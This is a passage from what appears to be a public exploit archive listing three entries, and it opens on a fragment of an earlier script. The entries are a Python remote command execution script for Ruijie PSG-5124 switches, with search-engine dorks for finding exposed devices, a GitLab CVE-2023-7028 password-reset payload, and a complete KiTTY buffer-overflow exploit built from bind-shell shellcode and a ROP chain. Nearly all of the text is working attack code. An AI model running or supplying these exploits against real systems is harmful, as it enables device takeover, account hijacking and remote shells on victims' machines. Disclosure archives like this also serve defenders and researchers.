"__main__": banner() main()
Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cmdnum": "1", "Confirm1": "n", "Content-Length": "0", "Command1": command } try: connection = http.client.HTTPConnection(f"{ip}:{port}") connection.request("GET", "/EXCU_SHELL", headers=headers) response = connection.getresponse() print(f"Status Code: {response.status}") print(response.read().decode('utf-8')) connection.close() except Exception as e: print(f"Request failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE') parser.add_argument('--ip', help='Target IP address', required=True) parser.add_argument('--port', help='Port', required=True) parser.add_argument('--cmd', help='Command', required=True) args = parser.parse_args() ip = args.ip port = args.port command = args.cmd send_request(ip, port, command)
GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset # Exploit Author: Sebastian Kriesten (0xB455) # Twitter: https://twitter.com/0xB455 # Date: 2024-01-12 # Vendor Homepage: gitlab.com # Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ # Version: <16.7.2, <16.6.4, <16.5.6 # CVE: CVE-2023-7028 Proof of Concept: user[email][][email protected]&user[email][][email protected]
KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #---------------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py # # windows/shell_bind_tcp - 375 bytes # # https://metasploit.com/ # # Encoder: x86/xor_poly # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #---------------------------------------------------------------------------------------------# buf = b"" buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41" buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff" buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc" buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28" buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f" buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb" buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4" buf += 
b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4" buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85" buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f" buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13" buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30" buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c" buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0" buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f" buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7" buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44" buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4" buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84" buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5" buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3" buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc" buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99" buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83" buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90" buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80" buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc" buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b" buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76" buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde" buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4" buf += b"\xf2\x3b\x21" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1052-len(sc)) assert len(sc) == 1052 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, 
# Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # push esp; ret 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40 # # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : # # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1052 # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 35 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'\x90' escape_sequence += 
b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()